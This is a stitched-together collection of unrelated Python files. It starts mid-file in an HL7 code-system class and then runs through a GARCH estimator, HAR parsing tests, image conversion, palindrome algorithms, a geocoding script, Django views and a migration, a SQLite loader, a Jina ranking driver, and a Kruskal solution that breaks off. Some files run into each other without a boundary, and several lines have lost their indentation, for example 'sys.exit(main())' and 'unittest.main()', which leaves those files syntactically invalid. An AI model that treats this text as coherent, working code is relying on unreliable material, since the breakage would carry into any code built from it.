    From: http://terminology.hl7.org/CodeSystem/adjudication-error in valuesets.xml
        This value set includes a smattering of adjudication codes.
    """

    def __init__(self, value: AutoMapperTextInputType):
        """Wrap *value* as a code from the adjudication-error code system."""
        super().__init__(value=value)

    """
    http://terminology.hl7.org/CodeSystem/adjudication-error
    """
    # URI of the code system every instance of this class belongs to.
    codeset: FhirUri = "http://terminology.hl7.org/CodeSystem/adjudication-error"
class AdjudicationErrorCodesCodeValues:
    """
    Missing Identifier
    From: http://terminology.hl7.org/CodeSystem/adjudication-error in valuesets.xml
    """

    # Code "a001" — Missing Identifier.
    MissingIdentifier = AdjudicationErrorCodesCode("a001")
    """
    Missing Creation Date
    From: http://terminology.hl7.org/CodeSystem/adjudication-error in valuesets.xml
    """
    # Code "a002" — Missing Creation Date.
    MissingCreationDate = AdjudicationErrorCodesCode("a002")
|
"""
Name : c15_16_GJR_GARCH_funciton.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : Yuxing Yan
Date : 6/6/2017
email : yany@canisius.edu
paulyxy@hotmail.com
"""
def GJR_GARCH(ret):
    """Estimate GJR-GARCH(1,1,1) parameters for the return series *ret*.

    Runs SLSQP over (mu, omega, alpha, gamma, beta) and returns the result
    of scipy.optimize.fmin_slsqp.
    """
    import numpy as np
    import scipy.optimize as op

    mean = ret.mean()
    var = ret.var()
    # Starting point for (mu, omega, alpha, gamma, beta).
    start_values = np.array([mean, var * 0.01, 0.03, 0.09, 0.90])
    # Box bounds: mu free around the mean, omega strictly positive,
    # the remaining parameters constrained to [0, 1].
    unit = (0.0, 1.0)
    eps = np.finfo(np.float64).eps
    bounds = [(-10 * mean, 10 * mean), (eps, 2 * var), unit, unit, unit]
    # Conditional variance workspace, initialized flat at the sample variance.
    sigma2 = np.repeat(var, np.size(ret, 0))
    return op.fmin_slsqp(gjr_garch_likelihood, start_values,
                         f_ieqcons=gjr_constraint, bounds=bounds,
                         args=(ret, sigma2))
#
import numpy as np
import matplotlib.pyplot as plt
from numpy import size, log, pi, sum, diff, array, zeros, diag, dot, mat, asarray, sqrt
from numpy.linalg import inv
from scipy.optimize import fmin_slsqp
from matplotlib.mlab import csv2rec
def gjr_garch_likelihood(parameters, data, sigma2, out=None):
    """Negative log-likelihood of a GJR-GARCH(1,1,1) model.

    Args:
        parameters: sequence (mu, omega, alpha, gamma, beta).
        data: 1-D array of returns.
        sigma2: 1-D working array of conditional variances; element 0 seeds
            the recursion and elements 1..T-1 are overwritten in place.
        out: if not None, also return the per-observation log-likelihoods
            and a copy of the fitted variance series.

    Returns:
        loglik, or (loglik, logliks, sigma2_copy) when *out* is given.
    """
    mu = parameters[0]
    omega = parameters[1]
    alpha = parameters[2]
    gamma = parameters[3]
    beta = parameters[4]

    T = np.size(data, 0)
    eps = data - mu
    # GJR recursion: the asymmetry term gamma fires only on negative shocks.
    # (range instead of Python-2-only xrange, so this runs on 2 and 3.)
    for t in range(1, T):
        sigma2[t] = (omega
                     + alpha * eps[t - 1] ** 2
                     + gamma * eps[t - 1] ** 2 * (eps[t - 1] < 0)
                     + beta * sigma2[t - 1])

    logliks = 0.5 * (np.log(2 * np.pi) + np.log(sigma2) + eps ** 2 / sigma2)
    loglik = np.sum(logliks)

    if out is None:
        return loglik
    # Bug fix: the original called the undefined name copy(); use
    # ndarray.copy() to return a snapshot of the fitted variances.
    return loglik, logliks, sigma2.copy()
def gjr_constraint(parameters, data, sigma2, out=None):
    """SLSQP inequality constraint: alpha + gamma/2 + beta <= 1."""
    alpha, gamma, beta = parameters[2], parameters[3], parameters[4]
    # Non-negative exactly when the stationarity condition holds.
    return np.array([1 - alpha - gamma / 2 - beta])
def hessian_2sided(fun, theta, args):
    """Two-sided finite-difference Hessian of *fun* at *theta*.

    Args:
        fun: objective, called as ``fun(theta, *args) -> float``.
        theta: 1-D parameter array. Entries should be nonzero, since the
            step size is scaled by ``1e-5 * |theta|``.
        args: extra positional arguments forwarded to *fun*.

    Returns:
        (K, K) symmetric ndarray of second derivatives.
    """
    f = fun(theta, *args)
    h = 1e-5 * np.abs(theta)
    # Round-trip through addition so the steps are exactly representable
    # in floating point (classic finite-difference trick).
    thetah = theta + h
    h = thetah - theta
    K = np.size(theta, 0)
    h = np.diag(h)

    # One-sided evaluations along each axis.
    # (range instead of Python-2-only xrange, so this runs on 2 and 3.)
    fp = np.zeros(K)
    fm = np.zeros(K)
    for i in range(K):
        fp[i] = fun(theta + h[i], *args)
        fm[i] = fun(theta - h[i], *args)

    # Paired evaluations for the mixed partials (symmetric, so j >= i only).
    fpp = np.zeros((K, K))
    fmm = np.zeros((K, K))
    for i in range(K):
        for j in range(i, K):
            fpp[i, j] = fun(theta + h[i] + h[j], *args)
            fpp[j, i] = fpp[i, j]
            fmm[i, j] = fun(theta - h[i] - h[j], *args)
            fmm[j, i] = fmm[i, j]

    # Outer product of the step sizes for the denominators.
    hh = np.diag(h)
    hh = hh.reshape((K, 1))
    hh = np.dot(hh, hh.T)

    H = np.zeros((K, K))
    for i in range(K):
        for j in range(i, K):
            # Standard 2-sided formula; (f + f) == 2*f at the center point.
            H[i, j] = (fpp[i, j] - fp[i] - fp[j] + f + f - fm[i] - fm[j] + fmm[i, j]) / hh[i, j] / 2
            H[j, i] = H[i, j]
    return H
|
# -*- coding: utf-8 -*-
import base64
import pytest
from splash.har.utils import get_response_body_bytes
def get_har_response(text, encoding):
    """Build a minimal HAR response dict whose body is *text*.

    When *encoding* is not None it is recorded under ``content.encoding``
    (e.g. 'base64' or 'binary').
    """
    content = {
        "size": len(text),
        "compression": 0,
        "mimeType": "text/html; charset=utf-8",
        "text": text,
    }
    if encoding is not None:
        content['encoding'] = encoding
    return {
        "status": 200,
        "statusText": "OK",
        "httpVersion": "HTTP/1.1",
        "cookies": [],
        "headers": [],
        "content": content,
        "redirectURL": "",
        "headersSize": -1,
        "bodySize": -1,
    }
# Each case: (HAR content text, content encoding, expected decoded bytes).
@pytest.mark.parametrize(["text", "encoding", "result"], [
    ["hello", None, b'hello'],
    [
        base64.b64encode(u"привет".encode('cp1251')).decode('ascii'),
        'base64',
        u"привет".encode('cp1251')
    ],
    ["", None, b""],
    ["", 'base64', b""],
    [u"привет", None, u"привет".encode('utf8')],
    [u"привет", 'binary', u"привет".encode('utf8')],
    [u"привет".encode('utf8'), 'binary', u"привет".encode('utf8')],
])
def test_get_body_bytes(text, encoding, result):
    """get_response_body_bytes must decode the HAR body per its encoding."""
    har_response = get_har_response(text, encoding)
    assert get_response_body_bytes(har_response) == result
def test_body_bytes_bad_encoding():
    """An unknown content encoding must raise ValueError."""
    har_response = get_har_response("hello", "i-am-unknown")
    with pytest.raises(ValueError):
        get_response_body_bytes(har_response)
|
import os
import logging
import json
def readMetadataFolderForImgConvert(folder, pos_subfolder):
    """Read one position's metadata.txt and convert its images.

    Parses <folder>/<pos_subfolder>/metadata.txt (Micro-Manager-style json —
    TODO confirm format) and, for each frame entry, derives the tif path and
    hands it to convert_multiple() for 's1' downscaling. Returns None when
    metadata.txt is missing.
    """
    logging.debug('readMetadataFolder(): %s, %s' % (folder, pos_subfolder))
    path = os.path.join(folder, pos_subfolder, 'metadata.txt')
    if not os.path.exists(path):
        logging.info('readMetadataFolder(): metadata.txt not found: %s' % (path))
        return None
    import sys
    sys.stdout.write('.')  # progress tick for batch runs
    # Read coord from metadata.txt
    with open(path) as f:
        try:
            obj = json.load(f)
            set_uuid = obj['Summary']['UUID']
            for fr in obj.keys():
                if fr == 'Summary':
                    continue
                objf = obj[fr]
                chname = objf['Channel']
                frame = objf['FrameIndex']
                # renamed from `slice`: don't shadow the builtin
                slice_index = objf['SliceIndex']
                # Older metadata lacks per-image UUIDs; synthesize one.
                uuid = objf.get('UUID') or (set_uuid + '_' + fr)
                imgpath = os.path.join(folder, pos_subfolder,
                                       'img_%09d_%s_%03d.tif' % (frame, chname, slice_index))
                convert_multiple(set_uuid, uuid, imgpath, quality=['s1'])
        except Exception as e:
            # Best-effort per position: log and let the batch continue.
            logging.error(e)
def convert(imgpath,outpath,method='scipy', size=0.25):
    # Downscale the image at *imgpath* to *outpath* at relative *size*.
    # method='ImageMagick' shells out to `convert`; method='scipy' loads the
    # tif and zooms it in-process. Any other method silently does nothing.
    if method == 'ImageMagick':
        import subprocess
        subprocess.call(['convert', '-quiet', '-contrast-stretch', '0.15x0.02%', '-resize', '%d%%' % (size*100), imgpath, outpath])
    elif method == 'scipy':
        import tifffile
        import scipy.misc,scipy.ndimage
        img = tifffile.imread(imgpath)
        img2 = scipy.ndimage.zoom(img,size)
        # NOTE(review): scipy.misc.imsave was removed in SciPy 1.2 — this
        # branch needs an old SciPy (or a port to imageio.imwrite); confirm
        # the pinned environment.
        scipy.misc.imsave(outpath, img2)
def convert_multiple(set_uuid, img_uuid, imgpath, quality=None, overwrite=False):
    """Write downscaled variants of imgpath under ../images/<set_uuid>/.

    quality: iterable of variant names; 'half' -> <img_uuid>.png at 50%,
    's1' -> <img_uuid>_s1.jpg at 12.5%.  Defaults to both variants.
    Existing outputs are kept unless overwrite is True.
    """
    # FIX: avoid the shared-mutable-default-argument pitfall; an immutable
    # tuple default preserves the original behavior safely.
    if quality is None:
        quality = ('half', 's1')
    outfolder = os.path.join('..', 'images', set_uuid)
    if not os.path.exists(outfolder):
        os.makedirs(outfolder)
    outpath_base = os.path.join(outfolder, img_uuid)
    outpath = outpath_base + '.png'
    if 'half' in quality and (overwrite or not os.path.exists(outpath)):
        convert(imgpath, outpath, method='scipy', size=0.5)
    outpath = outpath_base + '_s1.jpg'
    if 's1' in quality and (overwrite or not os.path.exists(outpath)):
        convert(imgpath, outpath, method='scipy', size=0.125)
import os, fnmatch
# http://stackoverflow.com/questions/6987123/search-in-wildcard-folders-recursively-in-python
def locate(pattern, root_path):
    """Yield absolute paths of files under root_path whose names match
    the fnmatch-style glob `pattern` (recursive)."""
    for dirpath, _dirnames, filenames in os.walk(os.path.abspath(root_path)):
        matched = fnmatch.filter(filenames, pattern)
        for name in matched:
            yield os.path.join(dirpath, name)
def batch_convert():
    """Find every metadata.txt under test_config.batch_root and convert the
    referenced images, one metadata folder per joblib worker."""
    import test_config
    import multiprocessing
    from joblib import Parallel, delayed
    # logging.basicConfig(level=logging.DEBUG)
    fs = []
    for f in locate('metadata.txt', test_config.batch_root):
        subfolder = f.replace('metadata.txt', '')
        folder = os.path.join(subfolder, '..')
        fs.append((folder, subfolder))
    # BUG FIX: report the number of metadata files found; len(f) was the
    # character count of the last path string, not the file count.
    print('%d metadata files.' % (len(fs)))
    num_cores = multiprocessing.cpu_count()
    Parallel(n_jobs=num_cores)(delayed(readMetadataFolderForImgConvert)(folder, subfolder)
                               for folder, subfolder in fs)
if __name__ == "__main__":
    batch_convert()
class Solution(object):
    """Longest-palindrome problems (LeetCode 516 subsequence / 5 substring)."""

    def longestPalindromeSubseq(self, s):
        """Return the length of the longest palindromic subsequence of s.

        Bottom-up DP: lpn[i][j] is the answer for s[i..j].  Instead of the
        classic s[i] == s[j] comparison, s[i] is paired with the *last*
        occurrence of the same character inside s[i+1..j].

        :type s: str
        :rtype: int
        """
        if len(s) <= 1:
            return len(s)
        lpn = [[0] * len(s) for i in range(len(s))]
        for i in range(len(s) - 1, -1, -1):
            for j in range(i, len(s)):
                if i == j:
                    lpn[i][j] = 1
                else:
                    # Rightmost occurrence of s[i] within s[i+1..j].
                    last_p = s.rfind(s[i], i + 1, j + 1)
                    if last_p == -1:
                        lpn[i][j] = lpn[i + 1][j]
                    else:
                        # Either wrap (s[i], s[last_p]) around the middle
                        # part, or drop s[i] entirely.
                        lpn[i][j] = max(2 + lpn[i + 1][last_p - 1], lpn[i + 1][j])
        return lpn[0][len(s) - 1]

    def longestPalindromeSubseq01(self, s):
        """Memoized top-down variant of longestPalindromeSubseq.

        :type s: str
        :rtype: int
        """
        if len(s) <= 1:
            return len(s)
        lpn = [[-1] * len(s) for i in range(len(s))]
        return self.db_up_to_bottom(s, 0, len(s) - 1, lpn)

    def longestPalindrome02(self, s):
        """Return the longest palindromic *substring* of s.

        r[i][j] records whether s[i..j] is a palindrome, filled from the
        back so r[i+1][j-1] is already known when r[i][j] is computed.

        :type s: str
        :rtype: str
        """
        r = [[True] * len(s) for i in range(len(s))]
        start = 0
        # BUG FIX: start with length 1 so inputs that contain no
        # multi-character palindrome (e.g. "ac") return a single character
        # instead of the empty string.
        length = 1
        if len(s) <= 1:
            return s
        for i in range(len(s) - 1, -1, -1):
            for j in range(i + 1, len(s)):
                if i + 1 == j:
                    r[i][j] = (s[i] == s[j])
                elif s[i] == s[j]:
                    r[i][j] = r[i + 1][j - 1]
                else:
                    r[i][j] = False
                if r[i][j] and j - i + 1 > length:
                    length = j - i + 1
                    start = i
        return s[start: start + length]

    def db_up_to_bottom(self, s, i, j, lpn):
        """Memoized recursion for the subsequence DP; lpn caches results."""
        if lpn[i][j] != -1:
            return lpn[i][j]
        if i > j or len(s) <= 0:
            return 0
        if i == j:
            lpn[i][j] = 1
            return lpn[i][j]
        last_p = s.rfind(s[i], i + 1, j + 1)
        if last_p == -1:
            lpn[i][j] = self.db_up_to_bottom(s, i + 1, j, lpn)
        else:
            lpn[i][j] = max(2 + self.db_up_to_bottom(s, i + 1, last_p - 1, lpn),
                            self.db_up_to_bottom(s, i + 1, j, lpn))
        return lpn[i][j]
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Parses the cities1000.txt geonames database and uses google maps
API to lookup locality, administrative_area_level_1 and country using
the latitude and longitude listed with each city.
Datafile sourced from: http://download.geonames.org/.
The contents of each lookup are written to a JSON-encoded file which
is re-read on each invocation. Only cities in cities1000.txt which are
not already accounted-for in the JSON-encoded file are looked up to
avoid duplicative queries.
Usage:
% python resources/geonames/geolookup.py --cityfile=cities1000.txt --lookupdb=lookup.json
"""
__author__ = 'spencer@emailscrubbed.com (Spencer Kimball)'
import json
import logging
import os
import sys
import time
from functools import partial
from operator import attrgetter
from tornado import httpclient, ioloop, options
from viewfinder.backend.base import util
from viewfinder.resources.geodata.geoprocessor import GeoProcessor
options.define('lookupdb', default='lookup.json', help='JSON output file containing lookup data')
options.define('query_rate', default=10, help='allowed queries per second to google maps')
class GeoLookup(object):
    """Main class for geolookup. Handles initial parse of JSON data
    file and spawns async HTTP queries to google maps API.
    """
    def __init__(self, io_loop, geoproc):
        self._io_loop = io_loop
        self._geoproc = geoproc
        self._http_client = httpclient.AsyncHTTPClient()
        try:
            # Resume from a previous run when the lookup file exists.
            with open(options.options.lookupdb, 'r') as rf:
                self._lookup_db = json.load(rf)
        except:
            # NOTE(review): the bare except treats any error (missing file,
            # corrupt JSON, I/O failure) as "start with an empty db".
            self._lookup_db = {}
    def RefreshDB(self, callback):
        """Refreshes the lookup database by iterating over all cities in
        the geoprocessor and querying google maps for address components
        for any that are missing.
        """
        def _OnLookup(city, barrier_cb, response):
            # Handle one geocode response; always release the barrier slot.
            if response.code != 200:
                logging.error('error in google maps API query: %s' % response)
            else:
                try:
                    json_response = json.loads(response.body)
                    components = []
                    if len(json_response['results']) > 0:
                        # Keep only the component types this tool cares about.
                        for comp in json_response['results'][0]['address_components']:
                            for t in comp['types']:
                                if t in ('locality', 'administrative_area_level_1', 'country'):
                                    components.append(comp)
                                    break
                    # Cache even empty results so the city is not re-queried.
                    self._lookup_db[city.id] = components
                except:
                    logging.exception('unable to parse google maps API response: %s' % response.body)
            barrier_cb()
        with util.Barrier(callback) as b:
            def _ProcessCities(cities):
                start_time = time.time()
                lookup_count = 0
                # NOTE(review): xrange implies this file targets Python 2.
                for index in xrange(len(cities)):
                    city = cities[index]
                    if city.id not in self._lookup_db:
                        lat, lon = float(city.lat), float(city.lon)
                        logging.info('looking up %s (%f, %f) via google maps API' % (city.name, lat, lon))
                        # Throttle: once the average rate exceeds query_rate,
                        # re-schedule the remaining cities one second later.
                        if lookup_count / (1.0 + time.time() - start_time) > options.options.query_rate:
                            logging.info('pausing to slow API query rate')
                            return self._io_loop.add_timeout(time.time() + 1.0, partial(_ProcessCities, cities[index:]))
                        lookup_count += 1
                        self._http_client.fetch('http://maps.googleapis.com/maps/api/geocode/json?latlng=%f,%f&sensor=false' %
                                                (lat, lon), callback=partial(_OnLookup, city, b.Callback()), method='GET')
            cities = self._geoproc.GetCities()
            _ProcessCities(cities)
    def SaveDB(self):
        """Saves the database to disk by writing to a temporary file and
        then renames.
        """
        tmp_file = options.options.lookupdb + '.bak'
        try:
            with open(tmp_file, 'w') as wf:
                json.dump(self._lookup_db, wf)
            os.rename(tmp_file, options.options.lookupdb)
        except:
            logging.exception('unable to write lookup database')
            # Remove the partially-written temp file on failure.
            os.unlink(tmp_file)
def main():
    """Run one refresh cycle: query missing cities, save the db, then exit."""
    io_loop = ioloop.IOLoop.instance()
    options.parse_command_line()
    geoproc = GeoProcessor()
    geolookup = GeoLookup(io_loop, geoproc)
    def _OnRefresh():
        # All lookups finished: persist results and stop the event loop.
        geolookup.SaveDB()
        io_loop.stop()
    geolookup.RefreshDB(_OnRefresh)
    io_loop.start()
    return 0
if __name__ == '__main__':
sys.exit(main())
|
from sys import stdin
from collections import deque
def main():
    """BFS shortest-move search on an n x n grid ('Castle on the Grid' style).

    Reads from stdin: the grid size, the grid rows ('X' = blocked), then a
    line with start-y start-x goal-y goal-x; prints the minimum number of
    straight-line moves from start to goal.
    """
    n = int(stdin.readline().strip())
    gval_line = [0 for i in range(n)]
    # gval[y][x]: moves used to reach (y, x); 0 means unvisited.
    gval = [gval_line[:] for i in range(n)]
    grid = []
    queue = deque([])
    for i in range(n):
        grid.append(input().strip())
    coords = [int(i) for i in input().strip().split(' ')]
    initial = (coords[0], coords[1])
    final = (coords[2], coords[3])
    queue.append(initial)
    while len(queue)!=0:
        curr = queue.popleft()
        y, x = curr
        if curr==final:
            print(str(gval[y][x]))
            break
        # Every cell reachable from here in one straight move costs one more.
        cval = gval[y][x]+1
        # Slide down, up, right, then left until a wall or the grid edge;
        # already-visited cells keep their earlier (smaller) value.
        for i in range(y+1, n):
            if grid[i][x] == 'X':
                break
            elif gval[i][x] == 0:
                gval[i][x] = cval
                queue.append((i, x))
        for i in range(y-1, -1, -1):
            if grid[i][x] == 'X':
                break
            elif gval[i][x] == 0:
                gval[i][x] = cval
                queue.append((i, x))
        for i in range(x+1, n):
            if grid[y][i] == 'X':
                break
            elif gval[y][i] == 0:
                gval[y][i] = cval
                queue.append((y, i))
        for i in range(x-1, -1, -1):
            if grid[y][i] == 'X':
                break
            elif gval[y][i] == 0:
                gval[y][i] = cval
                queue.append((y, i))
main()
|
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from tests import unittest, random_chars
import botocore.session
class TestCognitoIdentity(unittest.TestCase):
    """Integration test against the live Cognito Identity service (us-east-1)."""
    def setUp(self):
        self.session = botocore.session.get_session()
        self.client = self.session.create_client('cognito-identity', 'us-east-1')
    def test_can_create_and_delete_identity_pool(self):
        # Random suffix avoids name collisions between concurrent test runs.
        pool_name = 'test%s' % random_chars(10)
        response = self.client.create_identity_pool(
            IdentityPoolName=pool_name, AllowUnauthenticatedIdentities=True)
        # Clean up; also proves the pool was actually created.
        self.client.delete_identity_pool(IdentityPoolId=response['IdentityPoolId'])
if __name__ == '__main__':
unittest.main()
|
from django.shortcuts import render
from django.http import HttpResponse
from .models import Image, ImageCategory, ImageLocation
from django.core.exceptions import ObjectDoesNotExist
# Create your views here.
def index(request):
    """Landing page: all images plus every category and location filter."""
    context = {
        "images": Image.objects.all(),
        "categories": ImageCategory.objects.all(),
        "locations": ImageLocation.objects.all(),
    }
    return render(request, 'index.html', context)
def search_results(request):
    """Search images by category name taken from the ?category= parameter."""
    if 'category' in request.GET and request.GET["category"]:
        search_term = request.GET.get("category")
        print(search_term)
        try:
            categories = ImageCategory.objects.get(name=search_term)
            searched_images = Image.search_image(categories)
            print(searched_images)
            return render(request, 'search.html', {'images': searched_images})
        except ObjectDoesNotExist:
            # Unknown category: show a message plus all available categories.
            message = "No images found"
            categories = ImageCategory.objects.all()
            return render(request, "search.html", {"message": message, "categories": categories})
    else:
        message = "You haven't searched for any term"
        return render(request, 'search.html', {'message': message})
def view_image(request, image_id):
    """Render a single image page, or an apology when the id is unknown."""
    try:
        image = Image.objects.get(id=image_id)
    except ObjectDoesNotExist:
        message = 'Sorry, we could not find what you are looking for'
        return render(request, 'image.html', {'message': message})
    return render(request, 'image.html', {'image': image})
def get_category(request, category_id):
    """List images belonging to one category.

    FIX: handle a missing category like view_image does instead of letting
    ObjectDoesNotExist bubble up as a server error.
    """
    try:
        category = ImageCategory.objects.get(id=category_id)
    except ObjectDoesNotExist:
        return render(request, 'search.html', {'message': "No images found"})
    image = Image.search_image(category)
    return render(request, 'search.html', {'images': image})
def get_location(request, location_id):
    """List images taken at one location.

    FIX: handle a missing location like view_image does instead of letting
    ObjectDoesNotExist bubble up as a server error.
    """
    try:
        location = ImageLocation.objects.get(id=location_id)
    except ObjectDoesNotExist:
        return render(request, 'search.html', {'message': "No images found"})
    image = Image.search_by_location(location)
    return render(request, 'search.html', {'images': image})
|
# Generated by Django 3.1.2 on 2020-10-04 05:23
from django.db import migrations, models
# Auto-generated schema migration: creates the Dataset table and adds three
# columns to the existing `greeting` model.
class Migration(migrations.Migration):
    dependencies = [
        ('hello', '0002_auto_20201004_0330'),
    ]
    operations = [
        migrations.CreateModel(
            name='Dataset',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): max_length has no effect on IntegerField
                # (Django only uses it for char-like fields) -- confirm these
                # were not meant to be CharField, or drop the argument.
                ('sales', models.IntegerField(max_length=200)),
                ('label', models.IntegerField(max_length=200)),
                ('cost', models.IntegerField(max_length=200)),
                ('msrp', models.IntegerField(max_length=200)),
                ('month', models.IntegerField(max_length=200)),
                ('mon', models.IntegerField(max_length=200)),
                ('tues', models.IntegerField(max_length=200)),
                ('wed', models.IntegerField(max_length=200)),
                ('thurs', models.IntegerField(max_length=200)),
                ('fri', models.IntegerField(max_length=200)),
                ('sat', models.IntegerField(max_length=200)),
                ('sun', models.IntegerField(max_length=200)),
            ],
        ),
        migrations.AddField(
            model_name='greeting',
            name='BarcodeNum',
            # preserve_default=False: the default only back-fills existing rows.
            field=models.IntegerField(default=1, max_length=200),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='greeting',
            name='SKUNum',
            field=models.IntegerField(default=0, max_length=200),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='greeting',
            name='industry',
            field=models.CharField(default=1, max_length=200),
            preserve_default=False,
        ),
    ]
|
import sqlite3
import json
import os
import pandas as pd
import re
conn = sqlite3.connect('happiness.db')
c = conn.cursor()
# Create Countries table (one row per ISO country entry).
c.execute("""CREATE TABLE countries (id INTEGER PRIMARY KEY AUTOINCREMENT,country varchar, images_file text, image_url text, alpha2 text, alpha3 text,
    country_code integer, iso_3166_2 text, region text, sub_region text, intermediate_region text, region_code integer,
    sub_region_code integer, intermediate_region_code integer
    )""")
# Read countries json file.
# FIX: build the path with os.path.join (portable separators instead of
# Windows-only backslash literals) and use `with` so the file handle is
# closed -- the original handle was never closed.
countries_path = os.path.join('Data_Files', 'Data Files',
                              'countries_continents_codes_flags_url.json')
with open(countries_path, 'r') as json_file:
    countries_json_obj = json.load(json_file)
# Insert Data in Countries table
for country in countries_json_obj:
    c.execute("insert into countries (country,images_file,image_url,alpha2,alpha3,country_code,iso_3166_2,region,sub_region,intermediate_region,region_code,sub_region_code,intermediate_region_code) values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
              [country['country'], country['images_file'], country['image_url'], country['alpha-2'], country['alpha-3'],
               country['country-code'], country['iso_3166-2'], country['region'], country['sub-region'], country['intermediate-region'],
               country['region-code'], country['sub-region-code'], country['intermediate-region-code']])
conn.commit()
# Read the per-year report CSV files.
# FIX: portable path handling via os.path.join instead of backslash literals.
csv_dir = os.path.join(os.getcwd(), 'Data_Files', 'Data Files', 'csv_files')
csv_files = [name for name in os.listdir(csv_dir) if name.endswith('.csv')]
# Create a cleaned DataFrame per csv file.
df_list = []
for file_name in csv_files:
    frame = pd.read_csv(os.path.join(csv_dir, file_name))
    # Tag each row with the report year parsed from the filename.
    # FIX: raw string for the regex (avoids the invalid-escape warning).
    report_year = re.findall(r'(\d{4})', str(file_name))
    frame.loc[:, 'year'] = str(report_year[0])
    # Normalize column names to snake_case without punctuation.
    frame.columns = [x.lower().replace(" ", "_").replace("?", "")
                     .replace("-", "_").replace("(", "").replace(")", "")
                     .replace("..", "_").replace(".", "_")
                     for x in frame.columns]
    # Drop a trailing underscore left over from the substitutions above.
    for col in list(frame.columns):
        col_name = str(col)
        if col_name.endswith("_"):
            frame.rename(columns={col: col_name[:-1]}, inplace=True)
    # Harmonize column names that changed across report years.
    frame.rename(columns={"economy_gdp_per_capita": "gdp_per_capita",
                          "score": "happiness_score",
                          "freedom": "freedom_to_make_life_choices",
                          "country_or_region": "country",
                          "healthy_life_expectancy": "health_life_expectancy"},
                 inplace=True)
    df_list.append(frame)
result = pd.concat(df_list)
# Map pandas dtypes to SQLite column types.
replacements = {
    'object': 'varchar',
    'float64': 'float',
    'int64': 'int',
    'datetime64': 'timestamp',
    'timedelta64[ns]': 'varchar'
}
col_str = ", ".join("{} {}".format(n, d) for (n, d) in zip(result.columns, result.dtypes.replace(replacements)))
conn = sqlite3.connect('happiness.db')
c = conn.cursor()
# Create countries_happiness record table with the inferred schema.
c.execute("""CREATE TABLE countries_happiness (ID INTEGER PRIMARY KEY AUTOINCREMENT, %s);""" % (col_str))
conn.commit()
# Insert data from csv files to countries_happiness table.
result.to_sql(name="countries_happiness", con=conn, if_exists='append', index=False)
# Question 3 - SQL Query to CSV
SQL_Query_Q3 = pd.read_sql_query('''select ch.year,c.country,c.image_url,c.region_code,c.region,ch.gdp_per_capita,ch.family,ch.social_support,ch.health_life_expectancy,ch.freedom_to_make_life_choices,ch.generosity,ch.perceptions_of_corruption from countries c inner join countries_happiness ch on c.country=ch.country''', conn)
df2 = pd.DataFrame(SQL_Query_Q3)
df2.to_csv(os.path.join('Exported_csv', 'exported_data_q3.csv'), index=False)
conn.close()
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
# lift the chunk-level topk to doc-level topk
import numpy as np
from . import BaseExecutableDriver
from .helper import pb_obj2dict
if False:
from ..proto import jina_pb2
class BaseRankDriver(BaseExecutableDriver):
    """Drivers inherited from this Driver will bind :meth:`craft` by default """
    def __init__(self, executor: str = None, method: str = 'score', *args, **kwargs):
        # Binds the executor's 'score' method as the default exec_fn.
        super().__init__(executor, method, *args, **kwargs)
class Chunk2DocRankDriver(BaseRankDriver):
    """Extract chunk-level score and use the executor to compute the doc-level score

    In multi-level document, this aggregates kth level score back to (k-1)th level. It is recursive until we hit level-0
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.recursion_order = 'post'

    def _apply(self, doc: 'jina_pb2.Document', *args, **kwargs):
        """Collect (match id, parent id, chunk id, score) rows from all chunks,
        feed them to the rank executor, and append the resulting doc-level
        matches to ``doc``."""
        match_idx = []
        query_chunk_meta = {}
        match_chunk_meta = {}
        for c in doc.chunks:
            for k in c.matches:
                match_idx.append((k.id, k.parent_id, c.id, k.score.value))
                query_chunk_meta[c.id] = pb_obj2dict(c, self.exec.required_keys)
                match_chunk_meta[k.id] = pb_obj2dict(k, self.exec.required_keys)
        # np.uint32 uses 32 bits. np.float32 uses 23 bit mantissa, so integer greater than 2^23 will have their
        # least significant bits truncated.
        if match_idx:
            match_idx = np.array(match_idx, dtype=np.float64)
            doc_idx = self.exec_fn(match_idx, query_chunk_meta, match_chunk_meta)
            for _d in doc_idx:
                r = doc.matches.add()
                r.id = int(_d[0])
                r.level_depth = doc.level_depth  # the match and doc are always on the same level_depth
                r.score.ref_id = doc.id  # label the score is computed against doc
                r.score.value = _d[1]
                # BUG FIX: `exec` referred to the Python builtin, so op_name was
                # always 'builtin_function_or_method'; use the bound executor.
                r.score.op_name = self.exec.__class__.__name__
|
# BOJ 2887 행성 터널
import sys
sys.stdin = open('../input.txt', 'r')
si = sys.stdin.readline
def get_parent(parents, a):
    """Find the representative (root) of a's set, compressing the path."""
    if parents[a] != a:
        parents[a] = get_parent(parents, parents[a])
    return parents[a]


def find_parent(parents, a, b):
    """Return True when a and b already belong to the same set."""
    root_a = get_parent(parents, a)
    root_b = get_parent(parents, b)
    return root_a == root_b


def union_parent(parents, a, b):
    """Merge the sets containing a and b; the smaller root index wins."""
    root_a, root_b = get_parent(parents, a), get_parent(parents, b)
    if root_a < root_b:
        parents[root_b] = root_a
    else:
        parents[root_a] = root_b
def kruskal(edges):
    """Minimum-spanning-tree weight via Kruskal's algorithm.

    edges: list of (u, v, weight) tuples over the module-global `n` vertices.
    NOTE: sorts the caller's list in place and reads the global `n`.
    """
    edges.sort(key=lambda x: x[2])
    edge = 0  # edges accepted into the tree so far
    tot = 0   # accumulated MST weight
    parents = [i for i in range(n)]
    for i in range(len(edges)):
        a, b, c = edges[i]
        # Accept the edge only if it connects two different components.
        if not find_parent(parents, a, b):
            union_parent(parents, a, b)
            tot += c
            edge += 1
            # A spanning tree on n vertices has exactly n-1 edges.
            if edge == n - 1:
                break
    return tot
n = int(si())
